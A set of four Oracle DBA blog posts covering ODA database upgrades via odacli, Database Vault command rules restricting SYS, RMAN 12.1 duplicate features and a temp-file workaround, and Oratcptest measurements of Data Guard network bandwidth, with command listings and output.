[root@oda-dbi01 2018-02-19]# odacli upgrade-database -i de281792-1904-4536-b42c-8a55df489b73 -to 1ca87df9-4691-47ed-90a9-2a794128539d

{
"jobId" : "782e65fd-8b2b-4d16-a542-1f5b2b78d308",
"status" : "Created",
"message" : null,
"reports" : [ ],
"createTimestamp" : "February 19, 2018 17:40:58 PM CET",
"resourceList" : [ ],
"description" : "Database service upgrade with db ids: [de281792-1904-4536-b42c-8a55df489b73]",
"updatedTime" : "February 19, 2018 17:40:58 PM CET"
}

odacli will schedule a job for that, as for other operations. You can follow the job with describe-job:

[root@oda-dbi01 2018-02-19]# odacli describe-job -i 782e65fd-8b2b-4d16-a542-1f5b2b78d308

Job details
----------------------------------------------------------------
ID:  782e65fd-8b2b-4d16-a542-1f5b2b78d308
Description:  Database service upgrade with db ids: [de281792-1904-4536-b42c-8a55df489b73]
Status:  Running
Created:  February 19, 2018 5:40:58 PM CET
Message:

Task Name                                          Start Time                          End Time                            Status
-------------------------------------------------- ----------------------------------- ----------------------------------- ----------
Setting up ssh equivalance                         February 19, 2018 5:40:58 PM CET    February 19, 2018 5:40:58 PM CET    Success
Database Upgrade                                   February 19, 2018 5:40:58 PM CET    February 19, 2018 5:40:58 PM CET    Running

You can also look at the database alert.log file during the operation.
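
For example (the path below is an assumption based on the usual ADR layout, adapt it to your db_unique_name and instance name):

tail -f /u01/app/oracle/diag/rdbms/odaws11/ODAWS11/trace/alert_ODAWS11.log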

Be patient! A database upgrade takes time, at least 20 minutes for an empty database. And it seems that other jobs scheduled during the upgrade stay in waiting state (a create-database, for example).

[root@oda-dbi01 2018-02-19]# odacli describe-job -i 782e65fd-8b2b-4d16-a542-1f5b2b78d308

Job details
----------------------------------------------------------------
ID:  782e65fd-8b2b-4d16-a542-1f5b2b78d308
Description:  Database service upgrade with db ids: [de281792-1904-4536-b42c-8a55df489b73]
Status:  Running
Created:  February 19, 2018 5:40:58 PM CET
Message:

Task Name                                          Start Time                          End Time                            Status
-------------------------------------------------- ----------------------------------- ----------------------------------- ----------
Setting up ssh equivalance                         February 19, 2018 5:40:58 PM CET    February 19, 2018 5:40:58 PM CET    Success
Database Upgrade                                   February 19, 2018 5:40:58 PM CET    February 19, 2018 6:01:37 PM CET    Success

Now the upgrade seems OK, let’s check that:

su - oracle
. oraenv <<< ODAWS11
oracle@oda-dbi01:/home/oracle/ # sqlplus / as sysdba
SQL*Plus: Release 12.2.0.1.0 Production on Mon Feb 19 18:01:49 2018
Copyright (c) 1982, 2016, Oracle.  All rights reserved.

Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production

SQL> select instance_name, version from v$instance;

INSTANCE_NAME     VERSION
---------------- -----------------
ODAWS11      12.2.0.1.0

SQL> sho parameter spfile

NAME                 TYPE     VALUE
-------------------- -------- ---------------------------------------------------------------
spfile               string   /u01/app/oracle/product/12.2.0.1/dbhome_1/dbs/spfileODAWS11.ora

Even the spfile has been moved to the new home, quite nice.

Let’s check the repository:

[root@oda-dbi01 ~]# odacli list-databases

ID                                       DB Name    DB Type  DB Version           CDB        Class    Shape    Storage    Status        DbHomeID
---------------------------------------- ---------- -------- -------------------- ---------- -------- -------- ---------- ------------ ----------------------------------------
45ce9de7-3115-45b0-97b0-1384b8401e69     ODAWS      Si       12.2.0.1             false      OLTP     odb2     ASM        Configured   1ca87df9-4691-47ed-90a9-2a794128539d
a948a32c-1cf2-42c8-88c6-88fd9463b297     DBTEST1    Si       12.2.0.1             false      OLTP     odb1s    ACFS       Configured   1ca87df9-4691-47ed-90a9-2a794128539d
de281792-1904-4536-b42c-8a55df489b73     ODAWS11    Si       12.2.0.1             false      OLTP     odb2     ACFS       Configured   1ca87df9-4691-47ed-90a9-2a794128539d

Everything looks fine!

Now let’s test the upgrade with a 12.1 database, ODAWS12. This one is using ASM storage:

[root@oda-dbi01 ~]# odacli list-databases

ID                                       DB Name    DB Type  DB Version           CDB        Class    Shape    Storage    Status        DbHomeID
---------------------------------------- ---------- -------- -------------------- ---------- -------- -------- ---------- ------------ ----------------------------------------
45ce9de7-3115-45b0-97b0-1384b8401e69     ODAWS      Si       12.2.0.1             false      OLTP     odb2     ASM        Configured   1ca87df9-4691-47ed-90a9-2a794128539d
a948a32c-1cf2-42c8-88c6-88fd9463b297     DBTEST1    Si       12.2.0.1             false      OLTP     odb1s    ACFS       Configured   1ca87df9-4691-47ed-90a9-2a794128539d
de281792-1904-4536-b42c-8a55df489b73     ODAWS11    Si       12.2.0.1             false      OLTP     odb2     ACFS       Configured   1ca87df9-4691-47ed-90a9-2a794128539d
0276326c-cb6d-4246-9943-8289d29d6a4f     DBTEST2    Si       12.2.0.1             false      OLTP     odb1s    ACFS       Configured   7d2bbaa0-da3c-4455-abee-6bf4ff2d2630
24821a48-7474-4a8b-8f36-afca399b6def     ODAWS12    Si       12.1.0.2             false      OLTP     odb2     ASM        Configured   520167d7-59c8-4732-80a6-cc32ef745cec

[root@oda-dbi01 2018-02-19]# odacli upgrade-database -i 24821a48-7474-4a8b-8f36-afca399b6def -to 1ca87df9-4691-47ed-90a9-2a794128539d
{
"jobId" : "10a2a304-4e8e-4b82-acdc-e4c0aa8b21be",
"status" : "Created",
"message" : null,
"reports" : [ ],
"createTimestamp" : "February 19, 2018 18:36:17 PM CET",
"resourceList" : [ ],
"description" : "Database service upgrade with db ids: [24821a48-7474-4a8b-8f36-afca399b6def]",
"updatedTime" : "February 19, 2018 18:36:17 PM CET"
}

[root@oda-dbi01 ~]# odacli list-databases

ID                                       DB Name    DB Type  DB Version           CDB        Class    Shape    Storage    Status        DbHomeID
---------------------------------------- ---------- -------- -------------------- ---------- -------- -------- ---------- ------------ ----------------------------------------
45ce9de7-3115-45b0-97b0-1384b8401e69     ODAWS      Si       12.2.0.1             false      OLTP     odb2     ASM        Configured   1ca87df9-4691-47ed-90a9-2a794128539d
a948a32c-1cf2-42c8-88c6-88fd9463b297     DBTEST1    Si       12.2.0.1             false      OLTP     odb1s    ACFS       Configured   1ca87df9-4691-47ed-90a9-2a794128539d
de281792-1904-4536-b42c-8a55df489b73     ODAWS11    Si       12.2.0.1             false      OLTP     odb2     ACFS       Configured   1ca87df9-4691-47ed-90a9-2a794128539d
0276326c-cb6d-4246-9943-8289d29d6a4f     DBTEST2    Si       12.2.0.1             false      OLTP     odb1s    ACFS       Configured   7d2bbaa0-da3c-4455-abee-6bf4ff2d2630
24821a48-7474-4a8b-8f36-afca399b6def     ODAWS12    Si       12.1.0.2             false      OLTP     odb2     ASM        Updating     520167d7-59c8-4732-80a6-cc32ef745cec

[root@oda-dbi01 2018-02-19]# odacli describe-job -i 10a2a304-4e8e-4b82-acdc-e4c0aa8b21be

Job details
----------------------------------------------------------------
ID:  10a2a304-4e8e-4b82-acdc-e4c0aa8b21be
Description:  Database service upgrade with db ids: [24821a48-7474-4a8b-8f36-afca399b6def]
Status:  Running
Created:  February 19, 2018 6:36:17 PM CET
Message:

Task Name                                          Start Time                          End Time                            Status
-------------------------------------------------- ----------------------------------- ----------------------------------- ----------
Setting up ssh equivalance                         February 19, 2018 6:36:17 PM CET    February 19, 2018 6:36:17 PM CET    Success
Database Upgrade                                   February 19, 2018 6:36:17 PM CET    February 19, 2018 6:58:05 PM CET    Success

ID                                       DB Name    DB Type  DB Version           CDB        Class    Shape    Storage    Status        DbHomeID
---------------------------------------- ---------- -------- -------------------- ---------- -------- -------- ---------- ------------ ----------------------------------------
45ce9de7-3115-45b0-97b0-1384b8401e69     ODAWS      Si       12.2.0.1             false      OLTP     odb2     ASM        Configured   1ca87df9-4691-47ed-90a9-2a794128539d
a948a32c-1cf2-42c8-88c6-88fd9463b297     DBTEST1    Si       12.2.0.1             false      OLTP     odb1s    ACFS       Configured   1ca87df9-4691-47ed-90a9-2a794128539d
de281792-1904-4536-b42c-8a55df489b73     ODAWS11    Si       12.2.0.1             false      OLTP     odb2     ACFS       Configured   1ca87df9-4691-47ed-90a9-2a794128539d
0276326c-cb6d-4246-9943-8289d29d6a4f     DBTEST2    Si       12.2.0.1             false      OLTP     odb1s    ACFS       Configured   7d2bbaa0-da3c-4455-abee-6bf4ff2d2630
24821a48-7474-4a8b-8f36-afca399b6def     ODAWS12    Si       12.2.0.1             false      OLTP     odb2     ASM        Configured   1ca87df9-4691-47ed-90a9-2a794128539d

su - oracle
. oraenv <<< ODAWS12
oracle@oda-dbi01:/home/oracle/ # sqlplus / as sysdba
SQL*Plus: Release 12.2.0.1.0 Production on Mon Feb 19 18:59:08 2018
Copyright (c) 1982, 2016, Oracle.  All rights reserved.

Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production

SQL> select instance_name, version from v$instance;

INSTANCE_NAME     VERSION
---------------- -----------------
ODAWS12      12.2.0.1.0

SQL> sho parameter spfile

NAME               TYPE       VALUE
------------------ ---------- ---------------------------------------------
spfile             string     +DATA/ODAWS12/PARAMETERFILE/spfileodaws12.ora

It also worked fine with a 12.1 database, and it also took about 20 minutes for an empty database.

You may have noticed that it’s possible to upgrade several databases at the same time by providing multiple database ids. Not sure if you would do that in real life :-)
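
It should look like this (the -i option presumably takes a comma-separated list of ids, as suggested by the help output above; I have not tested it):

[root@oda-dbi01 ~]# odacli upgrade-database -i de281792-1904-4536-b42c-8a55df489b73,24821a48-7474-4a8b-8f36-afca399b6def -to 1ca87df9-4691-47ed-90a9-2a794128539d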

upgrade-database is also available on ODAs that are still using oakcli (nowadays only virtualized ODAs, I think), but as oakcli has no repository, the database id is replaced by the database name, and the db home id by the home name registered in the classic oraInventory, for example:

oakcli upgrade database -db ODAWS11 -to OraDb12201_home1

 

This great feature will not revolutionize your DBA life, but it should help you upgrade your databases with minimal effort.

 

Cet article One command database upgrade on ODA est apparu en premier sur Blog dbi services.

Database Vault : Rules, Rule Sets and Command Rules


In a previous blog I talked about protecting data using Realms. With Database Vault we can also protect our database against some SQL statements. These statements can include SELECT, ALTER SYSTEM, database definition language (DDL), and data manipulation language (DML) statements.
We can do this with Command Rules. In this blog I am demonstrating how we can use a Command Rule to prevent SYS from creating a new pluggable database in a multitenant environment.

Before starting the demonstration, we can see that there are some predefined Command Rules which apply to all users.

SQL> show user
USER is "C##DBV_OWNER_ROOT"
SQL> show con_name

CON_NAME
------------------------------
PDB1
SQL> SELECT COMMAND, RULE_SET_NAME FROM DVSYS.DBA_DV_COMMAND_RULE;

COMMAND              RULE_SET_NAME
-------------------- --------------------------------------------------
ALTER PROFILE        Can Maintain Accounts/Profiles
ALTER SYSTEM         Allow Fine Grained Control of System Parameters
ALTER USER           Can Maintain Own Account
CHANGE PASSWORD      Can Maintain Own Account
CREATE PROFILE       Can Maintain Accounts/Profiles
CREATE USER          Can Maintain Accounts/Profiles
DROP PROFILE         Can Maintain Accounts/Profiles
DROP USER            Can Maintain Accounts/Profiles

8 rows selected.
SQL>

Because of these default Command Rules, for example, user sys cannot create a user once Database Vault is enabled.

SQL> conn sys/root@pdb1 as sysdba
Connected.
SQL> create user myuser identified by test;
create user myuser identified by test
                                 *
ERROR at line 1:
ORA-01031: insufficient privileges

To grant a user the ability to use these commands, you can grant the user the role that the rule set checks.

SQL> SELECT PRIVILEGE FROM DBA_SYS_PRIVS WHERE GRANTEE = 'DV_ACCTMGR';

PRIVILEGE
----------------------------------------
DROP PROFILE
ALTER PROFILE
ALTER USER
CREATE PROFILE
CREATE USER
CREATE SESSION
DROP USER

7 rows selected.

SQL>

To allow sys to create a user we can grant the DV_ACCTMGR role to SYS

SQL> show user
USER is "C##DBV_ACCTMGR_ROOT"

SQL> show con_name

CON_NAME
------------------------------
PDB1
SQL>

SQL> grant  DV_ACCTMGR to sys;

Grant succeeded.

And now SYS can create a user

SQL> conn sys/root@pdb1 as sysdba
Connected.
SQL> create user myuser identified by test;

User created.

SQL>

Before creating the Command Rule, let’s verify that user SYS, by default, can create a pluggable database

SQL> conn sys as sysdba
Enter password:
Connected.
SQL> show con_name

CON_NAME
------------------------------
CDB$ROOT
SQL> create pluggable database PDB2 ADMIN USER pdb2adm IDENTIFIED BY root create_file_dest='/u01/app/oracle/oradata/DBSEC/PDB2';

Pluggable database created.

SQL>

To prevent sys from creating a pluggable database, we are first going to create a RULE. This rule will determine when the command rule will be fired.

SQL> exec DVSYS.DBMS_MACADM.CREATE_RULE(rule_name => 'MY_PDB_RULE', 
                                        rule_expr => 'SYS_CONTEXT(''USERENV'', ''SESSION_USER'') != ''SYS''');

PL/SQL procedure successfully completed.

SQL>

Next, we have to create a RULE SET, which is a collection of one or more rules. A rule set can be associated with a realm authorization, a factor assignment, a command rule, or a secure application role.

SQL> exec DVSYS.DBMS_MACADM.CREATE_RULE_SET(rule_set_name => 'MY_PDB_RULESET', 
                                            description => ' About managing Pdbs', 
                                            enabled => DBMS_MACUTL.G_YES, eval_options => DBMS_MACUTL.G_RULESET_EVAL_ANY,
                                            audit_options => DBMS_MACUTL.G_RULESET_AUDIT_FAIL + DBMS_MACUTL.G_RULESET_AUDIT_SUCCESS, 
                                            fail_options => DBMS_MACUTL.G_RULESET_FAIL_SILENT, fail_message => '', 
                                            fail_code => '', 
                                            handler_options => DBMS_MACUTL.G_RULESET_HANDLER_OFF, 
                                            handler => '',
                                            is_static => FALSE);

PL/SQL procedure successfully completed.
SQL>

We then add the RULE to the RULE SET

BEGIN
DVSYS.DBMS_MACADM.ADD_RULE_TO_RULE_SET(
                                       rule_set_name => 'MY_PDB_RULESET',
                                       rule_name => 'MY_PDB_RULE');
END;
   /

PL/SQL procedure successfully completed.

And finally we create a COMMAND RULE which will prevent SYS from executing a CREATE PLUGGABLE DATABASE statement

SQL> exec DVSYS.DBMS_MACADM.CREATE_COMMAND_RULE(command=> 'CREATE PLUGGABLE DATABASE', 
                                                rule_set_name => 'MY_PDB_RULESET', 
                                                object_owner => DBMS_ASSERT.ENQUOTE_NAME('%',FALSE), 
                                                object_name => '%',
                                                enabled => 'Y');

PL/SQL procedure successfully completed.

SQL>
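
You can verify that the new Command Rule is in place by querying DVSYS.DBA_DV_COMMAND_RULE again; it should now list CREATE PLUGGABLE DATABASE associated with the MY_PDB_RULESET rule set:

SQL> SELECT COMMAND, RULE_SET_NAME FROM DVSYS.DBA_DV_COMMAND_RULE WHERE COMMAND = 'CREATE PLUGGABLE DATABASE';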

And now if we try to create a PDB with SYS:

SQL> show user
USER is "SYS"
SQL> show con_name

CON_NAME
------------------------------
CDB$ROOT
SQL>  CREATE PLUGGABLE DATABASE PDB3 ADMIN USER pdb3adm IDENTIFIED BY root create_file_dest='/u01/app/oracle/oradata/DBSEC/PDB3';
 CREATE PLUGGABLE DATABASE PDB3 ADMIN USER pdb3adm IDENTIFIED BY root create_file_dest='/u01/app/oracle/oradata/DBSEC/PDB3'
*
ERROR at line 1:
ORA-47400: Command Rule violation for CREATE PLUGGABLE DATABASE on PDB3

SQL>
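
To roll back this demo, the command rule, the rule set and the rule can be removed with the corresponding DBMS_MACADM delete procedures. This is only a hedged sketch (parameter names may vary slightly between releases, check the DBMS_MACADM documentation for your version):

SQL> exec DVSYS.DBMS_MACADM.DELETE_COMMAND_RULE(command => 'CREATE PLUGGABLE DATABASE', object_owner => DBMS_ASSERT.ENQUOTE_NAME('%',FALSE), object_name => '%');
SQL> exec DVSYS.DBMS_MACADM.DELETE_RULE_FROM_RULE_SET(rule_set_name => 'MY_PDB_RULESET', rule_name => 'MY_PDB_RULE');
SQL> exec DVSYS.DBMS_MACADM.DELETE_RULE_SET(rule_set_name => 'MY_PDB_RULESET');
SQL> exec DVSYS.DBMS_MACADM.DELETE_RULE(rule_name => 'MY_PDB_RULE');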
 

Cet article Database Vault : Rules, Rule Sets and Command Rules est apparu en premier sur Blog dbi services.

New features and known issues with RMAN tool on Oracle database 12.1.0.2


Oracle Database 12c has new enhancements and additions in Recovery Manager (RMAN).
The RMAN tool continues to enhance and extend the reliability, efficiency, and availability of Oracle Database Backup and Recovery.
Below, I will mention a couple of new features for the RMAN duplicate command, and also how to avoid issues that can happen with the creation of the temporary files.

FEATURES:

<INFO>Using BACKUPSET clause :

In previous releases, active duplicates were performed using implicit image copy backups, transferred directly to the destination server. From 12.1 it is also possible to perform active duplicates using backup sets by including the USING BACKUPSET clause.
Compared to the other method (image copy backups), the unused block compression associated with a backup set reduces the amount of the data pulled across the network.
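
The syntax is simply the usual active duplicate with the additional clause, as used in the example later in this post:

RMAN> duplicate target database to <TNS_NAME_AUXILIARY> from active database using backupset;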

<INFO>Using SECTION SIZE clause:

The SECTION SIZE clause splits large datafiles into sections, so that several channels (according to the configured parallel degree) can restore different sections of the same datafile concurrently.
In my case I have configured the parallel degree to 6:

RMAN> CONFIGURE DEVICE TYPE DISK PARALLELISM 6 BACKUP TYPE TO BACKUPSET;

new RMAN configuration parameters:
CONFIGURE DEVICE TYPE DISK PARALLELISM 6 BACKUP TYPE TO BACKUPSET;
new RMAN configuration parameters are successfully stored

Starting restore at 19-JUL-2018 14:11:06
using channel ORA_AUX_DISK_1
using channel ORA_AUX_DISK_2
using channel ORA_AUX_DISK_3
using channel ORA_AUX_DISK_4
using channel ORA_AUX_DISK_5
using channel ORA_AUX_DISK_6
channel ORA_AUX_DISK_3: using network backup set from service PROD2_SITE1
channel ORA_AUX_DISK_3: specifying datafile(s) to restore from backup set
channel ORA_AUX_DISK_3: restoring datafile 00005 to /u02/oradata/PROD/data.dbf
channel ORA_AUX_DISK_3: restoring section 2 of 7

------
channel ORA_AUX_DISK_2: starting datafile backup set restore
channel ORA_AUX_DISK_2: using network backup set from service PROD2_SITE1
channel ORA_AUX_DISK_2: specifying datafile(s) to restore from backup set
channel ORA_AUX_DISK_2: restoring datafile 00005 to /u02/oradata/PROD/data.dbf
channel ORA_AUX_DISK_2: restoring section 7 of 7

ISSUES :
<WARN>When duplicating on 12cR1, the creation of the temp files is not always handled correctly.
Duplicating from active or from backup, using Oracle 12cR1, you can run into some issues with the temporary files.

oracle@dbisrv02:/u01/app/oracle/product/12.1.0/dbhome_1/dbs/ [PROD] rman target sys/pwd00@<TNS_NAME_TARGET> auxiliary sys/pwd00@<TNS_NAME_AUXILIARY> 
Recovery Manager: Release 12.1.0.2.0 - Production on Thu Jul 19 13:31:20 2018

Copyright (c) 1982, 2014, Oracle and/or its affiliates.  All rights reserved.

connected to target database: <TNS_NAME_TARGET> (DBID=xxxxxxxxxx)
connected to auxiliary database: <TNS_NAME_AUXILIARY> (not mounted)

duplicate target database to <TNS_NAME_AUXILIARY> from active database using backupset section size 500m;

----------------------------------------
contents of Memory Script:
{
   Alter clone database open resetlogs;
}
executing Memory Script

database opened
Finished Duplicate Db at 19-JUL-2018 14:26:09

<INFO>Querying v$tempfile does not reveal any error:

SQL> select file#,name,status from v$tempfile;

     FILE# NAME                           STATUS
---------- ------------------------------ -------
         1 /u02/oradata/<AUXILIARY>/temp01.dbf   ONLINE

<INFO>But when querying dba_temp_files, or running transactions that need the temporary tablespace, you will get:

SQL> select * from dba_temp_files;
select * from dba_temp_files
              *
ERROR at line 1:
ORA-01187: cannot read from file  because it failed verification tests
ORA-01110: data file 201: '/u02/oradata/<AUXILIARY>/temp01.dbf'

Solution 1: Drop and recreate your temporary tablespace(s) manually (a sketch follows below). This could be tedious if you have several of them. OR
Solution 2: Remove the temp files of your <to_be_cloned_DB> on the OS side before launching the duplicate, as demonstrated in the listing after the sketch. For more details you can consult MOS note 2250889.1.

SQL> col TABLESPACE_NAME format a50;
SQL> col file_name format a50;
SQL> select file_name,TABLESPACE_NAME from dba_temp_files;

FILE_NAME                                          TABLESPACE_NAME
-------------------------------------------------- --------------------------------------------------
/u02/oradata/<AUXILIARY>/temp01.dbf                       TEMP

SQL>startup nomount;

rm -rf /u02/oradata/<AUXILIARY>/temp01.dbf

 

oracle@dbisrv02:/u01/app/oracle/product/12.1.0/dbhome_1/dbs/ [PROD] rman target sys/pwd00@<TNS_NAME_TARGET> auxiliary sys/pwd00@<TNS_NAME_AUXILIARY> 
Recovery Manager: Release 12.1.0.2.0 - Production on Thu Jul 19 13:31:20 2018

Copyright (c) 1982, 2014, Oracle and/or its affiliates.  All rights reserved.

connected to target database: <TNS_NAME_TARGET> (DBID=xxxxxxxxxx)
connected to auxiliary database: <TNS_NAME_AUXILIARY> (not mounted)

duplicate target database to <TNS_NAME_AUXILIARY> from active database using backupset section size 500m;

At the end of the duplicate, you should be able to use the database without any manual action on the temp files:

SQL> select file#,name,status from v$tempfile;

     FILE# NAME                           STATUS
---------- ------------------------------ -------
         1 /u02/oradata/<AUXILIARY>/temp01.dbf   ONLINE

Additionally, if your auxiliary DB is managed by Oracle Grid Infrastructure, you need to remove it from Grid Infrastructure for the duration of these actions and add it back once you have finished (a hedged example is shown after the listing below).

SQL> alter system set db_unique_name='PROD_SITE2' scope=spfile;
alter system set db_unique_name='PROD_SITE2' scope=spfile
*
ERROR at line 1:
ORA-32017: failure in updating SPFILE
ORA-65500: could not modify DB_UNIQUE_NAME, resource exists

--remove from GRID
[grid@dbisrv02 ~]$ srvctl stop database -d PROD
[grid@dbisrv02 ~]$ srvctl remove database -d PROD
Remove the database PROD? (y/[n]) Y

SQL> startup
ORACLE instance started.

Total System Global Area  788529152 bytes
Fixed Size                  2929352 bytes
Variable Size             314576184 bytes
Database Buffers          465567744 bytes
Redo Buffers                5455872 bytes
Database mounted.
Database opened.

SQL> alter system set db_unique_name='PROD_SITE2' scope=spfile;

System altered.
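
Once everything is finished, the database can be registered again in Grid Infrastructure. This is only a hedged example (home path, db_name and options are assumptions to adapt to your environment):

[grid@dbisrv02 ~]$ srvctl add database -db PROD_SITE2 -oraclehome /u01/app/oracle/product/12.1.0/dbhome_1 -dbname PROD
[grid@dbisrv02 ~]$ srvctl start database -db PROD_SITE2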
 

Cet article New features and known issues with RMAN tool on Oracle database 12.1.0.2 est apparu en premier sur Blog dbi services.

Using Oratcptest


Recently I did some tests with Oratcptest. This is a command line tool which can be used to measure network bandwidth and network latency between a client and a server.
In this blog I am going to show how to use this tool in a Data Guard environment.
I am using a Data Guard environment with the following configuration.


Configuration - PROD

  Protection Mode: MaxAvailability
  Members:
  PROD_SITE1 - Primary database
    PROD_SITE2 - Physical standby database
    PROD_SITE3 - Physical standby database

Fast-Start Failover: DISABLED

Configuration Status:
SUCCESS   (status updated 54 seconds ago)

DGMGRL> show database 'PROD_SITE1' LogXptMode;
  LogXptMode = 'SYNC'
DGMGRL> show database 'PROD_SITE2' LogXptMode;
  LogXptMode = 'SYNC'
DGMGRL> show database 'PROD_SITE3' LogXptMode;
  LogXptMode = 'SYNC'
DGMGRL>

The installation of Oratcptest is very simple. We just have to download the oratcptest.jar file from the Oracle Support site on each server. Note that JRE 6 or higher is required. In my case I have JRE 8 on all servers:

[oracle@primaserver oratcptest]$ java -version
openjdk version "1.8.0_111"
OpenJDK Runtime Environment (build 1.8.0_111-b15)
OpenJDK 64-Bit Server VM (build 25.111-b15, mixed mode)
[oracle@primaserver oratcptest]$

[oracle@standserver1 oratcptest]$ java -version
openjdk version "1.8.0_181"
OpenJDK Runtime Environment (build 1.8.0_181-b13)
OpenJDK 64-Bit Server VM (build 25.181-b13, mixed mode)
[oracle@standserver1 oratcptest]$

[oracle@standserver2 ~]$ java -version
openjdk version "1.8.0_181"
OpenJDK Runtime Environment (build 1.8.0_181-b13)
OpenJDK 64-Bit Server VM (build 25.181-b13, mixed mode)
[oracle@standserver2 ~]$

We can invoke the help command to see all options available for the oratcptest

[oracle@primaserver oratcptest]$ java -jar oratcptest.jar -help

Now we can assess the network bandwidth for our Data Guard configuration. Note that I am using simple virtual machines, but the steps are the same on real production servers.
We first have to determine the highest redo generation rate of the database. The following query can be used:

select thread#, sequence#,
       blocks*block_size/1024/1024 MB,
       (next_time-first_time)*86400 sec,
       blocks*block_size/1024/1024/((next_time-first_time)*86400) "MB/s"
from   v$archived_log
where  (next_time-first_time)*86400 <> 0
and    first_time between to_date('2018/08/09 08:00:00','YYYY/MM/DD HH24:MI:SS')
                       and to_date('2018/08/09 11:00:00','YYYY/MM/DD HH24:MI:SS')
and    dest_id = 2
order by first_time;

   THREAD#  SEQUENCE#         MB        SEC       MB/s
---------- ---------- ---------- ---------- ----------
         1        124 .003417969          9 .000379774
         1        125 .271972656        184 .001478112
         1        126 .001953125          5 .000390625
         1        127 11.3662109        915 .012422088
         1        128 10.8466797       6353 .001707332

We can see that the highest value is .012422088 MB/s. The goal is to see if our network bandwidth can support this rate.
As we are using SYNC mode, the primary database will wait for a confirmation from standby databases that they have written the change to disk before informing the application of the commit success.
For SYNC transport we then have to determine the average redo write size, which is calculated using the following formula:

Average=redo size / redo writes

These metrics can be obtained using an AWR report. In our case the value is

Average=15924844/4015=3967
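
If you do not have an AWR report at hand, the two underlying statistics can also be sampled directly from v$sysstat (they are cumulative since instance startup, so take the delta between two samples covering your peak period):

SQL> select name, value from v$sysstat where name in ('redo size','redo writes');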

Now we are going to simulate SYNC writes over the network using Oratcptest. Note that I need the location of my standby redo logs:

SQL> select member from v$logfile where type='STANDBY';

MEMBER
--------------------------------------------------------------------------------
/u01/app/oracle/oradata/PROD/stredo01.log
/u01/app/oracle/oradata/PROD/stredo02.log
/u01/app/oracle/oradata/PROD/stredo03.log
/u01/app/oracle/oradata/PROD/stredo04.log

From the standby server I can run the following command:

[oracle@standserver1 oratcptest]$ java -jar oratcptest.jar -server -port=5555 -file=/u01/app/oracle/oradata/PROD/myoratcp.tmp
OraTcpTest server started.

From the primary server

[oracle@primaserver oratcptest]$ java -jar oratcptest.jar standserver1 -port=5555  -write  -mode=sync -length=3967 -duration=10s -interval=2s
[Requesting a test]
        Message payload        = 3967 bytes
        Payload content type   = RANDOM
        Delay between messages = NO
        Number of connections  = 1
        Socket send buffer     = (system default)
        Transport mode         = SYNC
        Disk write             = YES
        Statistics interval    = 2 seconds
        Test duration          = 10 seconds
        Test frequency         = NO
        Network Timeout        = NO
        (1 Mbyte = 1024x1024 bytes)

(14:26:16) The server is ready.
                    Throughput             Latency
(14:26:18)      1.124 Mbytes/s            3.375 ms   (disk-write 2.537 ms)
(14:26:20)      0.813 Mbytes/s            4.668 ms   (disk-write 3.775 ms)
(14:26:22)      1.094 Mbytes/s            3.467 ms   (disk-write 2.773 ms)
(14:26:24)      1.004 Mbytes/s            3.778 ms   (disk-write 2.991 ms)
(14:26:26)      0.560 Mbytes/s            6.779 ms   (disk-write 5.623 ms)
(14:26:26) Test finished.
               Socket send buffer = 11700 bytes
                  Avg. throughput = 0.920 Mbytes/s
                     Avg. latency = 4.126 ms (disk-write 3.280 ms)

[oracle@primaserver oratcptest]$

We can see that the average throughput is 0.920 MB/s, which is more than enough to handle our peak redo rate of .012422088 MB/s. We can also note the latency, which includes the time to send the message to the server host, the optional disk write at the server host, and the acknowledgment back to the client process.
If we are using ASYNC mode (no disk write requested), the test looks like this:

[oracle@primaserver oratcptest]$ java -jar oratcptest.jar standserver1 -port=5555    -mode=async -length=3967 -duration=10s -interval=2s
[Requesting a test]
        Message payload        = 3967 bytes
        Payload content type   = RANDOM
        Delay between messages = NO
        Number of connections  = 1
        Socket send buffer     = (system default)
        Transport mode         = ASYNC
        Disk write             = NO
        Statistics interval    = 2 seconds
        Test duration          = 10 seconds
        Test frequency         = NO
        Network Timeout        = NO
        (1 Mbyte = 1024x1024 bytes)

(14:58:03) The server is ready.
                    Throughput
(14:58:05)     13.897 Mbytes/s
(14:58:09)      5.193 Mbytes/s
(14:58:11)     40.007 Mbytes/s
(14:58:13)     21.475 Mbytes/s
(14:58:13) Test finished.
               Socket send buffer = 210600 bytes
                  Avg. throughput = 16.901 Mbytes/s

[oracle@primaserver oratcptest]$

Conclusion
In this blog we have talked about Oratcptest, a simple tool which helps to assess network bandwidth and latency, for example before setting up RMAN backups or file copies over the network, or before implementing a Data Guard environment.
Reference : Oracle Doc ID 2064368.1

 

Cet article Using Oratcptest est apparu en premier sur Blog dbi services.
